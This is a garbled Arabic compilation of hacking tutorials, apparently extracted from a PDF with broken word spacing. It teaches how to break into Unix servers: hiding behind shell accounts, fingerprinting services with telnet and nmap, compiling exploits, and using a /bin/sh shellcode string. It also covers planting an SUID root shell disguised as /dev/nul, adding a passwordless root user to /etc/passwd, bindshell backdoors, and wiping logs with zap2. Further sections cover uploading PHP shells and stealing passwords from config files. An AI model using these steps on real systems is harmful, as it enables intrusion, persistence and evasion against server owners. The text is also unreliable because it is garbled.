$$$$$$$$$$$$ 

الكاتب:أی س ر 

$$$$$$$$$$$$ 

UNix Usage IN HackinG 

اهلا بكم جمیعا 

في البدایهاحبانانوهانهناكالعدید منالدروسالجمیله فعلا .. ولكنهاقدیمه ولیست 

لذلكاكتبلكم هذاالدرس المطوللكي یكون مكاناللمبتدئین یمكنان یستفیدوا منه 

و اتمنى فعلاان یحوز علىاعجابكم 

بع ضالمصطلحات الهامه : 

كثیر من الناس یحبونان یطلقوا علىكل منال 

up to date 

pc , servers , supercomputers و غیرها 

(: 

- 

كلمه BOX 

النظام الذي سو ف نقومباختراقه یحتوي عاده علىالعدید منالیوزرز ‏..بالاضافهللیوزرز 

تسطیعانتطلق علىالرئیسهناككلمه 

و هوالادمیناو المدیر على النظام....‏ 

بالنسبه لانظمهالتشغیل 

طبعا ‏..لا یمكنكانتخترقباستخدام نظامالتشغیل windows ‏..بلتحتاجالىاي نظام مشتق من نظام 

التشغیلالیونیكس .. 

حسنا ‏..السؤالهولماذا هذهالانظمهبالذات ‏...ولماذا لا یصلحالویندوز؟؟ 

لسبیبن 

الانترنتا غلبه اجهزه شغاله علىالیونیكس سیستمز ‏...و نادرلماتلاقي جهاز شغال علىالویندوز 

nt 

، و هو یكونsuperuser ... root 

.. 

: 

: 


. 9x 

اذناقل حاجه حتىتخترق جهازاو سیرفیر شغال علىالیونیكس ‏..یجبانتكون ملمابنظامالتشغیل هذا..‏ 

لذا منالافضلانكتركبهفي جهازك 

معظمادوات واكوادالاكسبلویتات مصممهللعملفيبیئه الیونیكس 

.. 

-٢ طبعا .. 

... 

اوكي ماهيتوزیعاتالیونیكس ؟؟واللینكس ؟؟ 

بالنسبهللیونیكس ‏..فهو منقسماليقسمین 

١- یونیك ستجاري غیر مجاني 

٢- یونیكس مفتوحالمصدر و مجاني open source 

.. لذافیمكنكتجاهلهالان (: 

: 

( 

). 

بالنسبهللیونیكسالتجاري لا یمكنانتركبه على جهازكالعادي 

اما المجانيفیوجد منه عده عائلات 

BSD- 

و هيالاقدم والاصعبفيالاستعمال .. و منالافضللكالاتستعملهاالااذاكنتترغ بفيتركیب سیرفیر 

على الجهاز 

... 

یوجداللینكس ‏..وهو طبعا غني عنالتعری ف 

١٨١



( 


.. 

طبعا .. یوجد منهالعدید من التوزیعات وانكانافضلها هي SuSe ‏(لماجربها ولكناسمعالكثیر من 

الناس یشكرونفي هذه التوزیعه 

امابالنسبه لاسهلتوزیهفهي MDK وقدوضعت هنا بع ضالدروس الخاصهبالمندریك 

یمكنكتحمیلها وقرائتها 

انلمتجد مكانات حصل منه علىاللینكس یمكنك مراسلتي علىایمیلي و نحدد مكانا 

لتسلیمك نسخه منالماندریك ‎٩‎اوالرید هات‎٧٫٢‎ ‏(ثمنالاسطواناتالبلانك و النسخفقط 

علىاي حال ‏..للینكس ممیزاتكثیره امن مجاني ‏..یمكنكتطویرهلیلائمامكانیات جهازك 

( 

... مستقر .. 

.. 

.. 

.. 

‏-الانترنت 

ماذا ‏...تریدانتخترق ‏..جمیل جمیل ‏..تریدانتخترق جهازكام ماذا ؟؟ 

اه..تریدانتختر قاجهزه مبحرهفيالانترنت اذن ‏..دعنا نبحر علىالانترنت 

(: 

... 

انا عار فانك حصلت على الدرس ده منالانترنت ‏..لكن هذاكان عن طریقالویندوز 

‏..لكنانتالیومانسان مختل ف...ان تانسانلینكسي ذهفلسفه محترمه 

اذن یجبانتبحرالىالانترنت من نظامالیونیكس ‏..لناساسا یجبانتعر فالمودم بتاعك علىاللینكس 

حسبالتوزیعهاللي عندك حاولتعر فالمودم .. حتلاقياناللینكسلم یجداي مودم موصلبالجهاز ؟؟ 

ما هذا .. لا تتعجب 

فكلالمودماتالدا خلیه یطلقون علیها 

لماذا لانها مصممهاساساللعملتحت نظام التشغیل windows ‏..ارجوك لاتلوماللینكس 

بل یجبانتلوم صانعكروتالفاكسالداخلیه هذه 

اوكي امابالنسبهللمودم الخارجي externalفهو مودم حقیقي 

... یوجد العدید منالمودمز الخارجیه مثل 

یجبان تتاكدانالمودم یكون 

علىاي حال خلینافي موضوعنا...‏ 

خلا ص ‏..ادخل علىالانترنت من خلالال isp وذلك من خلال نظاماللیونیكس 

.. 

.. winmodems 

internal 

.. 

(: 

real or true modems 

acorp , u.s. robotics 

USB ولیس serial 

(: 

.. 

... 

: 

.. 

.. 

.. 

.. 


اهم حاجهقبلالشرو عفيالاختراقهيانتحاولالایتمالایقا عبك وكشف محاولتك لاختراق سیریفیر 

معین 

و طبعا هنك و سائل عدیدهلذلكلن اتطرقالیها لانهناكالعدید من الشروحالمتمیزهفي مجالالحمایه 

وازالهالاثر 

الخصهمفي نقطتیناوثلاثه 

ایكانتحاولانتسجلفي موقعتحاولاختراقه .. و لا حتىباساميمزوره لان هذاقد یجعلك عرضه 

لكش فالايبي الخا صبك 

و منثمال ispثم رقم هاتفك و صباحالفل ت 

‎٢‎‏-ایاكان تتباهىباختراقاتكابدااما غیرالمهتمینبامورالهاك 

احاولالاتخترق دائم من خلال جهازك ‏...لا لا ‏..انتفهمتني غلط م شقصديیعنيتروحلنتكافیه 

.. 

... 

.. لكن 

-٣ 

(: 

جهازك ‏=====>الجهازالض حیه ... ده م ش مامون 

جهازك======>‏ جهاز وسیط======>‏ السیرفیرالض حیه ‏...دهكدهكویساوي 

طیبایهالجهازالوسیط ده..‏ ده ممكن یكون مثلا جهاز مخترق منقبلاو شیل اكاونت 

. 

١٨٢


طیب ماهوالشیلاكاون ت:هو عباره عن خدمه حیث یمكنك من خلالهاالتحكمفي جهاز من بعید و هذا 

الجهاز علیه نظامالیونیكس 

طبعا من غیرانتقومباختراق هذا الجهاز ‏..و یوجد العدید ممن یقدمون هذا الحدمه مجانا 

٤- حاولان لاتختر قاجهزه خطیره و مهمه مثل .mil. govاو سیرفیرا تاجب علیكقبلان 

غیرها من هذاالنمط.‏ 

٥- هذه النقطهتعتمد على بع ضتقنیاتالفریكینج 

edu. و 

.. 

.. لعملاخفاءلرقمتلیفونك عنمزودالخدمهلدیك . 

REdirecting 

: 

‏-فح صالمواقع ومنافذ ال TCP 

یجب علیكقبلانتقومبالاخترا قانتعر فكیف یمشيالانترنت ‏..انهیعتمد علىبروتوكول یدعى 

TCP\IP 

.... 

... ركزمعایاابوسایدك = D 

و بع ض البروتوكولاتالاخرى 

طیب 

المفرو ضانكل جهاز على الن تبیكونفیهبورتات مفتوحه ‏..هذاالبورتات یمكنكانتقوم من خلالها 

بارسالالداتا 

من جهاز الى ذلك الجهاز ‏..هذه البورتاتالمفتوحه ‏(المفتوحهفقط ‏)تكون علىاستعدد دائما لتلقي الداتا 

من ریموتبوكس 

دائما ماترتب طالبورتات المفتوحهبما یسمىبخدمه 

و هذا الخدمه service تكون مستضافه من خلال دیمون 

اذن ‏..الدیمون هذااذاقام صاحبالموقع بفتحهفيالسیرفیرفانه یقوم بفتح منفذفيالسیرفیر .. لكي یقوم 

الدیمون هذا من خلاله بتقدیمالخدمهالملعونه = D 

و هذه بع ض الخدمات معالبورتاتالخاصهبهم لكن طبعا هناككثییر 


.. 


... 


... 

ماهيالمنافذ المفتوحهفيالسیرفیر المستهد ف اذنكیفت حصل عىالمعلومات هذه 

من خلال ماالscaners port ‏...السكانرز هي عباره عنبرامجتحولان تتصلبالسیرفیر المستهد ف 

من خلال جمیع المنا فذ ‏..و ذلكلمعرفهاي البورتاتالمفتوحه 

في هذا السیرفیر اشهر هذا السكانرز هيالاداه nmapبواسطه fyodor ول حسن الحظ یوجد نسخه 

منها خاصهبالویندوز و ‏..!!ایه ده ‏..؟؟ 

احنام ش اتفقنا ننسىالویندوز ده خال ص=




.'[^' Escape character is 

.target.edu FTP server (SunOS 5.6) ready ٢٢٠ 

quit 

.Goodbye ٢٢١ 

Connection closed by foreign host 

اهاااا 

دول دلونا علىمعلوما تقیمهاوياوي 

١- نظامالتشغیل هناك هو 

٢- دیمونالا فتيبي هناك هوالstandard الليبییجي مع نظمالسن sunOS 

(: 

SunOS 5.6 

تعال نجرببورتتانينتصلبیه منالتلنت : 

bash-2.03$ telnet target.edu 25 

...Trying xx.xx.xx.xx 

.Connected to target.edu 


target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 ٢٢٠ 

09:18:14 -0 

(EDT) ٤٠٠ 

quit 

target.edu closing connection ٢٫٠٫٠ ٢٢١ 

.Connection closed by foreign host 

ایضااستفدنامعلوما تقیمه هيان دیمون smtp هوال sendmail واناصداره هو ٨٫١١٫٠/ 

٨٫٩٫٣ 

جمیل حمیل .. طیبلماذا نحتج الى هذاالمعلومات ؟؟ لانالاكسبلویت والثغرهالموجوده دائماتعتمد على 

ال daemonالموجود و على نظامالتشغیل لكنتوجد مشكله وهيان بع ض المكعلوماتقد یمكنان 

تكونمزورهاو غیر ص حیحه 

ازاي ؟؟؟تابعمعایاكده 

.. 

: 

بالاداه nmap 

bash-2.03$ nmap -sS target.edu 

Starting nmap V. 2.53 by fyodor@insecure.org ( 

( /www.insecure.org/nmap 

:(Interesting ports on target.edu (xx.xx.xx.xx 

The 1518 ports scanned but not shown below are in state: closed) 

( 

Port State Service 

tcp open ftp/٢١ 

tcp open telnet/٢٣ 

١٨٥




tcp open smtp/٢٥ 

tcp open http/٨٠ 

tcp open pop3/١١٠ 

TCP Sequence Prediction: Class=random positive increments 

(!Difficulty=937544 (Good luck 

Remote operating system guess: Linux 2.1.122 - 2.2.14 

Nmap run completed -- 1 IP address (1 host up) scanned in 34 

seconds 

!!!!!! 

یانهاراسود 

نظامالتشغیل الليالادهقامت بتخمینه هولینكس 

م شكان sunOS ‏!!!!!!اه یا و لادالكلب = @ 

بساحنابرده لازمنعر فتوزیعهاللینكسالوجوده .. لكن نقدر نقولانالمعلومات اللي جمعناهاكفایه و 

ممكنتمشي 

طیب ‏..كدهاحناقمن بعمل سكان علىالموقع ولكن ممكناحدالادمینزلو عر فانانناقمنابفح ص موقعه 

‏...اعتقد نه حیكون زعلان منن و حنا م ش عایزینالادمینیزعل مننالذلك 

استخدمناالاختیار علىاي حلفان عمل سكانلموقع یعتبر عمل شرعيلا مشاكلفیه =D 

|: 

Ss- 

لمزید منالمعلومات راجع:‏ 

bash-2.03$ man nmap 

رفعادواتك على شلاكونت 

‏(هذه الخطوهاذاكن عندك شیلاكاونت و م ش عایزتخترق من جهازك 

( 

اتبعالتالي : 

bash-2.03$ ls 

program.c 

sh-2.03$ ftp shell.com 

Connected to shell.com 

.shell.com FTP server (SunOS 5.6) ready ٢٢٠ 

Name: luser 

.Password required for luser ٣٣١ 

:Password 

.User luser logged in ٢٣٠ 

ftp> put program.c 

.PORT command successful ٢٠٠ 

.(ASCII data connection for program.c (204.42.253.18,57982 ١٥٠ 

.Transfer complete ٢٢٦ 

ftp> quit 

Goodbye ٢٢١ 

.. 

١٨٦




طبعا هذهالطریقه ن خلالاftp 

و هي غیر محببه لانهاتقوم بعمل ملفاتاللوجلذلك یفضللكانتقومبنسح سورسكودالاكسبلویت و 

لصقهافي مل ففيالشیل 

. 

sh-2.03$ vi exploit.c 

ثمانسخ الكودثمافتح تیرمینالتانيو اتصلبالشیل والصق الكودفي ملف و سمیهبامتداد.‏c 

كدهانت رفعتالاكسبلویت بتاعتكللشیلاكاونت 

. 

وكومبایلللاكسبلویتو بعدیناعملها رن على الهوستالمستهد ف 

sh-2.03$ gcc program.c -o program 

sh-2.03$ ./program 

-: 

. 

ملحوظه : عیباويانكتاخدالامرین دولكقاعده مسلمبیها..كلاكسبلود ولهاوامرهالخاصهفي 

الكومبایل وله طریقهفيالتشغیل 

تظهر هذا الطریقهفيالتعلیق البرمجياوفيالusage . 

‏-استغلالالثغراتالمختلفه 

هذااهمجزافي الموضو ع بمجردانتعر ف ماهو نظامالتشغیل عند الموقع المستهد ف وایضا الدیمونز 

الشغاله علىالسیرفیر 

فیمكنكانتذهبالىايدتابیزاللي بتقدم اكسبلویت ‏..و دي موجوده بكثره علىالانترنت 

http://www.linux.com.cn/hack.co.za 

مثلا دهفیهكل حاجه ممكن تتخیله .. مقسمهالى دیمونات و نظمتشغیل 

ولكن ‏..ماهيالاكسبلویت ؟؟ 

الاكسبلویت عباره عن سورسكود عاده مكتوبفبلغه السياوالبیرلالمهمان 

الاكسبلویت ديتقومباستغلال منطقهمعینهفيالسیرفیر في حاله TARGET.EDU 

یمكنناان نستخدمالاكسبلویت الخاصه ب 

علىفكرهالعیال دیمااسمعهم یقولواان السند میل هواكبر دیمونمعر ضللاختراق ‏..م ش عار فایه 

السند میلاساسا ؟؟ 

طیب روو حللدرس ده و نتتعر ف 

.. 

sendmail 8.11.0 اواي دیموناخر 

: 

http://www.pharaonics.net/less/NEtworks/124.htm 

.. 

. 

( 

.... 

.. 

.. 

فیه حاجه لازمتعرفها انلماتشغلاكسبلویت على سیرفیرمعین ایهالفوائداللي جتعود علیك ‏(غیر طبعا 

اختراق الموقع 

حت حصل على حاجتین اتنین اول حاجه شیل عادي 

تاني حاجه و دهالمهمبالنسبهلنا مایسمىبالرووت شیل 

طبعاانتلواخدت رووت شیل علىالسیرفیراذنفانتكدهتمتلككفهالصلاحیات و ممكنتعملكلاللي 

انت عایزه ‏..ممكنتستعملالرووت شیل دهكجهاز و سیط زي ماقلتفياول الدرس 

دتابیز صغیرهللاكسبلویتات هي 

www.securityfocus.com : 

www.insecure.org/sploits.html 

.. 

.. طیب زي ماقل تانكلاكسبلویت مختلفه عنالاخر ى و یجب علیكانتقراالكود بتاعهااوالتعلیقا تاذا 

كنت لاتفهمفيلغهالبرمجه 

مناسهل واشهرالاكسبلویتاتهي البفراوفرفلو ... یقوم هذهالاكسبلویت بعمل ) دربكهفي الدیمون 

مم یؤديالىتشغیلالكودالذيتریده 

( 

١٨٧




یقوم هذا الكود بتشغیل شیلفيالسیرفیرلذلكفهو یسمى شیلكودcode shell 

طبعا یختل ف هذاالكودتبعالنظامالتشغیل ‏..لذلك یجب علینااننعر ف نظمالتشغیلالمستخدمفيالسیرفیر 

لو شوفناكود اكسبلویتمعینه ممكن نلاقي ده 

= []char shellcode 

\" 

"xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b 

\" 

"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd 

‏"\‏x80\xe8\xdc\xff\xff\xff/bin/sh؛"‏ 

اها..دههللینكس و یقوم بتشغیلالشیلالليفيالمسار دهه bin/sh/ 

طبعالوالسیرفیر بتاعك شغال على نظامتشغیلاخراذن یجب علیكانتغیرالشیلكود 

دهالىاخر یناسبالنظامالمستهد ف .. طبعا ممكنتلاقي شیلكودسلجمیع نظمالتشغیلفي مواقع 

السیكیورتي المختلفه.‏ 

... 

زي ماقلت یجب علیك الباانك متستعمل ش جهازكفيالاختراق .. وانماتستخدم جهازا وسیطااو شیل 

اكاونت ‏..طریقهلدخولالىالشیل اكاونتكالتالي 

bash-2.03$ telnet myshellaccount 23 

...Trying xx.xx.xx.xx 

.Connected to yourshellaccount 


Welcome to yourshellaccount 

login: malicioususer 

(Password: (it doesn't display 

.




یا عیني ‏..كدهانا بقیت رووت =) 

طیبفیه العدید منالاكسبلویتت م ش بتخلیك رووت علىالسیستم..وانماتدیكبس شیلهنال 

لذلك یجب علیك نتقومبرفع اكسبلةیتاخرلوكل 

لل حصول على الرروتفيالنظام...‏ تذكر نتحاولان تتجنب رفعالاكسبلویتاتبالا فتيبي علىقدر 

المستطا ع ‏(احنا عایزینك =)) 

فیه اكسبلویتاتاخر ىتعطیك صلاحیهاظهار مل فالباسورد..ايتي سي => 

local 

‏-وضعباك دور :- 

جمیل ‏..اذنفقداخذنا رووت علىالسیستم ‏..ماذا بعد ؟؟؟فعلاانتفيامكانكانتقوم بتغیرالموقعاو 

الصفحهالرئیسیه 

كل ما علیكانتب حث عنالاندكسفياي مكاناوباستخدامالامرفایند 

لكن هذابصراحه و من غیر زعل ‏..ده شغل اللامرز لان عیباويانكتفرد عضلاتك على موقع 

فاغلبالهاكرزبامكانهماختراق هذه الدومینات 

ولكنانص حك جدیا بتغییرالصفحهالرئیسیهفي موقع محترم مثل 

edu. 

.. 

.. 

microsoft.com , ibm.com etc 

.. 

اوالمواقعالسیئهالمحتو ىكالاباحیهاو التيتسب الدین ... علىاي حل م ش موضوعنا دهه 

طیباحنا دلوقتي عایزین نحتفظبالموقع دهه تذكرالثلا ثاجهزهایاهم 

جهازك----->‏ جهاز وسیط------>الجهازالمستهد ف . 

اذن حنعملایه دلوقتي؟؟ 

في حاجه انتلو كتبت exit حتطلعبرهالسیرفیر دهوتعودللشیل بتاعك و عشانترجعتاني یلزمك 

نفسالخطوات 

وفي هذه الفترهقد یحتملان یكونالادمینقدقام بتغییرالباسورداو ركببات شللدیمونالمصاباوقام 

بعملاب جریدله 

مما یؤديانتفشلالاكسبلویتفي عملها ‏..و الحل ؟؟ 

بساحنا دلوقتي رووت و ممكننعمل الليفي نفسنا اذن نركبباك دوور یسمحلنابالعوده بعد ذلكفي 

اي وقت 

احسنباك دور هوه الهاك اتاك .. صعبان النورتون یكشفه و ممك...‏ اه =| =| 

ایه الكلام ده یاد یاایسر ؟؟؟؟ 

هاك اتاك =| 

اس ف نسیت 

طبعاالباك دورزفي موضوعي دهتختلفتماما عن الكلام الفاضي ده و لا مؤاخذه 

طبعاالباك دورز دي عایزالها موضو علواحدهان شاءاحطهلكمقریبا ‏..لكنانا ساذكرلكمالاساسیات 

فق ط 

‎١‎‏-ازايتعمل sushi؟؟؟؟ 

یلزمكانتقومبنسخال 

لكيتقوم بعمل 

الى مكان خفي و نقومباعطاءه صلاحیاتال suidكالتالي 

bin/sh/ 

: 

... 

!!!!!! 

(= ... 

suid shell او sushi 

sh-2.03$ cp /bin/sh /dev/nul 

هههههه 

.. 

.. 

فياغلبالاحیانالادمین لا ینظر داخلالدایركتوري .. dev ولو حصل و نظر دخلهفانهلن یشعربشيء 

غ ریب لانفیه مل فاساسااسمه 

D = لا دهاحنا عیال جدعاناوي =D 

null 

١٨٩




sh-2.03$ cd /dev 

sh-2.03$ chown root nul 

نعطي الشیلالصلاحیات اللياحنا عایزینها :- 

. 

sh-2.03$ chmod 4775 nul 

٤٧٧٥ 

chmod +s nul 

.. 

معناهاال suid اللياحنا عایزینها 

ممكن میشتغل شفي بع 

خليبالكانالامر 

فيكله 

ضالانظمه 

.. خلیك معالامرالاولبیعمل 

كده خلصنا مهمتنا 

sh-2.03$ exit 

.. تعالى نطلعبرهكده و نشو ف 

بعد ٨٠ یوملو رجعنا =D تعال نشو فكدهاللي حی حصل 

: 

sh-2.03$ whoami 

luser 

sh-2.03$ /dev/nul 


root 

احنا سوبر یوزرزالان بكل سهوله =) 

فیه مشكله ‏..فيكثیر منالشیلزتمنعاعطاء صلاحیاتال suid یعني مینفعش ن حصل علىال 

وفي هذه الحاله یلزمناان نرفعللسیرفیرالمخترق شیل خا صتانياسمه sash وهواختصار ل 

sushi 

A 

stand-alone shell 

ذواوامر خاصهبه ... 

و هو یسمحباعطاء صلاحیاتالsuid 

ل bin/sh/ اذن نقدرنعملالانال 

sushi 

‎٢‎‏-كیف نضی ف یوزرزمزورین ؟؟ 

طبعاانت رووت وتقدرتعملتغییرفيالمل ف 

اي حدانت عایزه 

باستعمال المحرر 

etc/passwd/ و ممكن من خلالالمل ف دهانكتضی ف 

vi 

-: vi 

sh-2.03$ vi /etc/passwd 

طبعا لازم یكون عندكفكره عنكیفیهاستخدامالمحرر 

في المل ف ده حتلاقي سطرلكل یوزر عادي یكون علىالشكل ده 

luser:passwd:uid:gid:startdir:shell 

في حاله السوبر یوزرزبیكونال 

اذناض ف السطر ده 

uid & gid =0 

: 

dood::0:0:dood:/:/bin/sh 

وكدهاانت ضفت سوبر یوزرللنظام 

sh-2.03$ su dood 


dood 

١٩٠




وال uid 

طبعااحنا رووت 

‏..لیه لانالا خ dood كل منال gid 

یساوي صفر 

‎٣‎‏-كیفتضع 

.. 

bindshell ؟ 

bindshell 

.. 

-: 

- 

عباره عن دیمون شبیه جدبال telnetd فيالحقیقهالتلنت دیمون عباره عنبایند شیل 

البایند شیل هذا یقوم بفتحبورتاو منفذیعني ولكنهلیس منفذ TCP بل منفذ UDP 

و طبعابیعطیك شیل عندالاتصالبهذاالبورت 

الطری ف والشیقفي الموضو عانهالادمینلما ییجيیعمل سكان علىالجهاز بتاعهللتامین عاده وفي 

اغلبالاحیانالسكن یكون 

على منافذال TCP و نادرا جداانیعمل سكان على منافذبروتوكول UDP 

.. 

عملیهازالهالاثار 

في نظاامالیونیكس ‏..عندماتقومبالدخول الى حسابك ‏..فنكاترى رساله عنداول الدخولتعلمكباخر مره 

قمتبهابالدخول و رقمالايبيالذي د خلت منه 

یعني سیادتكلو دخلتباسم یوزرو بعدكدهالیوزر ده دخل حیلاقيالرساله دي 

.




: luser 

sh-2.03$ ./zap2 luser 

!Zap2 

sh-2.03$ who 

sh-2.03$ 

لواسمك 

..... 

١٩٢




" 

$$$$$$$$$$$$$$$ 

الكاتب:‏ Arab VieruZ 

$$$$$$$$$$$$$$$ 

درس عن الShell PHP ‏(الجزء الأول)‏ " 

موضو عللبي ات شبي شل یشرح الطرق والخدا ع المستخدمة واوامرلینكس 

البي ات شبي شیل ملف یرعبكل صاحب موقع على سیرفر وحلهاسهل مما یمكن 

الموضوعبسیط جداًلكن سأطولهقلیلاًفسمحولي 

(: 

: الجزء الأول 

^^^^^^^^^ 

اوامرلینكس 

*-----------------------------------------------* 

امر سرد الملفات a-ls 

: 

سرد جمیعالملفاتالمخفیةاو غیرها 

*-----------------------------------------------* 

امر عر ض محتویاتالملف 

e-catاو 

cat ‏(هام جدا)‏ 

: 

فتح المل ف وعر ض محتویاته 

*-----------------------------------------------* 

امر حذ فالملف : f-rm 

لحذ ف المل ف الذيترید 

*-----------------------------------------------* 

امر حذ فالمجلد : d-rm 

لحذ فالمجلد الذيترید 

*-----------------------------------------------* 

امرالنسخ : i-cp 

لنسخالمل فالذيترید 

*-----------------------------------------------* 

امراعادةالتسمیة : mv 

١٩٣




لأعادةالتسمیة 

*-----------------------------------------------* 

ملا حظة ‏:لمعر ف المزید مناوامرلینكسقمبشراءالكتب ولل حصول علىمعلومات اكثرلأمر من الأوامر 

كمبوضعالأمرثم 

مثال 

help– 

help--ls : 

*-----------------------------------------------* 

: الجزء الثاني 

^^^^^^^^^ 

كیفیةتنفیذ الأوامر : 

*-----------------------------------------------* 

١٩٤




١- ستجد مربعللكتابةقم بكتابةالأمرالمرادتنفیذه 

٢- هناتعر ض الملفات و المجلدات 

٣- هناتعر ض المجلداتفقط 

: 

٤- مكان الفلودر الذيتعمل علیهالآن 

٥- ضع العلامةلیخبرك ما یحد ث عند وجود خطأ 

*-----------------------------------------------* 

*-----------------------------------------------* 

الجزء الثالث 

^^^^^^^^^ 

الخد ع والطرق لتحمیل هذا المل ف:‏ 

*-----------------------------------------------* 

هناتأتي المشكله 

!!! 

لكنلیس ت مست حیله وسنستعر ض بع ض الطرقالتي اتبعهاانا شخصیاً‏ 

‎١‎‏-ایجادثغرةتستطیع منهاتحمیلالملف مثال ‏:ثغرةالنیوك القدیمة حقت ال txt.hacked 

*-----------------------------------------------* 

‎٢‎‏-لنفر ضاننا نریداختراق موقعمعین وكان صاحبالموقع ذكي جداً‏ وحری ص 

هذي طریقهقدتنفعاولاًتحدیدالشركةالمستضیفة و نحاول الب حث عن مواقعفي نفسالسیرفراو على 

الأقلفي نفس شركةالأستضافة یكون صاحبها دلخ ونحاول نلقىثغرة نحمل منها المل ف 

*-----------------------------------------------* 

‎٣‎‏-المواقعالمجانیة التيتدعمالبي ات شبي....‏ 

١٩٥




" 

$$$$$$$$$$$$$$$ 


$$$$$$$$$$$$$$$ 

نتابعالموضو ع مباشره 

الجزء الرابع : 

^^^^^^^^ 

طرقال حصول على الباسورد:‏ 

درس عن الShell PHP ‏(الجزء الثاني)‏ " 

*-----------------------------------------------* 

هذا الجزء سیأخذ موضو ع ال ٢PHP Shell 

طرقال حصول على الباسوردهي مناصعب الطرق التيقدتواجه المخترق 

. 

*-----------------------------------------------* 

‎١‎‏-اخذالباس من ملفاتاكسسال My SQL التيتسمىبالعادة php.config 

ویمكناخذالباس عن طری قتنفیذ الأمر التاليفيال 

الذهاب الى المجلد الذي یوجدفیه هذاالمل ف وكتابة الأمر التالي 

وسیظهر الباسوردفياحدالمتغیرات 

PHP Shell 

php.cat config 

*-----------------------------------------------* 

htpasswed. 

/passwd/admin/forum/htpasswds./site/home : 

swdpas/admin/forum/htpasswds./site/home/cat 

: 

‎٢‎‏-اخذالباس المشفر من مل فال 

ویمكناجاد هذا المل ففياحد مجلداتالسیرفر واذالمتجدهقم بفتح ال htaccess. حتىتجد مكان 

المل ف السابق مثال 

الأمر 

ستجد الباس المشفر بتشفیر DESیعنيتقدرتفكهبجون ذا رایبر 

oerdY٣oS٤nymw:user 

*-----------------------------------------------* 

٣- طریقة الأكستینشون سیرفراو : pwd.service 

وهوتابعللفرون تبیج ویوجدبهالباسوردالخا صبالفرون تبیج مشفر DES 

ویوجد داخل مجلد 

: 

tvp_itv_ 

الأمر : pwd.service/tvp_itv_/www/site/home/cat 

رابط : راجع درس DeXXa الخا صبهذا القسم 

oerdY٣oS٤nymw:user 

*-----------------------------------------------* 

٤- لا یمكناعتبارهاكقسم لاكنكملاحظةالا وهي : 

ان بع ضالمواقع تتحدفي سكربتات مثلال phpMyAdmin ویكونلكن موقعاكسس خا صلدخول هذا 

السكربت ویكونبمل ف ال php.config یكونالرو تللقاعدةیعني یمكنتعدلوتمسحايقاعدةلأي 

موقعكان !! 

١٩٦




" 

$$$$$$$$$$$$$$$ 


$$$$$$$$$$$$$$$ 

درس عن الShell PHP ‏(الجزء الثالث)‏ " 

الجزء الخام س والأ خیر 

^^^^^^^^^^^^^^ 

بماانكالآن عرفتمعظمالأشیاءلكن لابد من وجود مشاكل سأذكر الذياصابني 

*-----------------------------------* 

١- مشكلة عر ض المواقعالاخرى : 

جمیعالمواقع الموجودةفيالسیرفرفي 

: 

/ 

home/ 

الأمر ‏:قمبالذهاب الى مجلد الروت 

home/a -ls 

ستجد مجلداتكل مجلد یحوي ملفات موقع ما لعرضه 

SITE/home/a -ls 

SITE ‏=اسمالموقعاوالمجلد 

: 

*-----------------------------------* 

: 

: 

٢- مشكلة عر ض ملفات الموقع 

بع ضالسیرفرات لاتسمحبدخول home الموقعالااذاكن تانت روتاو صاحب الموقع الحل 

قمبدخول 

/public_html/tesi/home 

او 

/www/site/home 

لدخول الى ملفات الموقع التيتعر ض 

*-----------------------------------* 

٣- بع ض الأوامرلاتعمل 

هذه مشكله منالصعب حلها ویجباستعمالباك دور خا ص بكرنلالسیرفر ... اقصداصدار الكرنل . 

١٩٧



" شرح أداة " anmap 


$$$$$$$$$$$$$$$$$$ 

مترجمبواسطة:الهكر الخجول 

$$$$$$$$$$$$$$$$$$ 

: 

nmap 

الإسم 

‏-أداةكش ف عنالشبكات و ماسحأمني 

الخلاصة 

أنوا ع المسح ‏-الخیارات 

: 

الوص ف : 

صمم هذا البرنامجلكي یسمحلمدراءالنظام و الأفرادبمسح شبكاتكبیرة لتقریرومعرفةالمضیفین 

وماذا یقدمون من خدمات . وتدعمالإنماب عددكبیر منتقنیات المسح مثل 

: 

.. مثل : 

UDP 

()TCP connect 

(TCP SYN (half open 

(ftp proxy (bounceattack 

Reverse-ident 

(ICMP (ping sweep 

FIN 

ACK sweep 

Xmas Tree 

SYN sweep 

.and Null scan 

الإنمابتقدمأیضاً‏ عدد منالممیزات المتقدمة 

TCP/IP fingerprinting remote OS detection via 

stealth scanning 

dynamic delay and retransmission calculations 

parallel scanning 

detection of down hosts via parallel pings 

decoy scanning port 

filtering detection 

direct (non-portmapper) RPC scanning 

fragmentation scanning 

flexible target and port specification 

١٩٨




: 

نتائجالإنماب عادةاً‏ ماتكون علىهیئةقائمةبالبورتاتالمهمهالتيتوجدفيالآلةالتيأجریت علیها عملیة 

المسح . والإنماب دائماًیعطیناالبورتات وإسمالخدمة والعدد والحالة والبروتوكول 

الحالهإماأنتكون مفتوحةاو مرشحةأو غیر مرشحة 

مفتوحةتعنيأنالآلة سو فتقبلأيإتصالبهذاالبورت 

المرشحةتعنيأنهناكفایروولأوفلتر ‏(مرشح)أوأي عقبةأخرىتغطي هذاالبورتوتمنعالإنماب من 

معرفة حالةالبورتإ ذاكان مفتوحاًأو لا 

غیر مرشحتعني بأن هذاالبورت معرو فلدىالإنماب بأنه مغلق ولا یبدوأنأيفایروولأوفلتر ‏(مرشح)‏ 

تدخلفي محاولةالإنماب والبورتات غیر المرشحة هيأغلبالحالات ولا یمكنمعرفتهمإلافي حالة واحدة 

، هيأن یكونمعظم البورتاتالتيأجریتلهم عملةالمسحفي حالةترشیح 

وبا لإ عتماد علىالخیارات المستخدمهفيالإنمابفیمكنأن یبلغ عنالحالاتالممیزةالتالیةفي الریموت 

هوست 

النظام المستخدم 

TCP sequencability 

أسماءالمستخدمینالذین یشغلونالبرامج المرتبطة بكلبورت 

أسماءالديإنإس 

وبع ض الأشیاء الأخرى ... 

١٩٩




" 

طریقة لإقتحام السيرفرات بدون ثغرات 

" 

$$$$$$$$$$$$$$$$$$ 

الكاتب:‏ network access 

$$$$$$$$$$$$$$$$$$ 

فیه طرقمعروفهتمكنك منالدخول ولوبنسبه ٥٠% علىاغلبالسیرفراتالموجودهبالعالم لاحظ ٥٠% 

اولا الجهماتالاولى دائمایكون الغر ض منهاتكوینمعلومات عامه عنالسیرفرالذي یراد مهاجمت ه ومن 

هنا نبداالهجوم وعلىاياساسیتركزالهجوم.‏ 

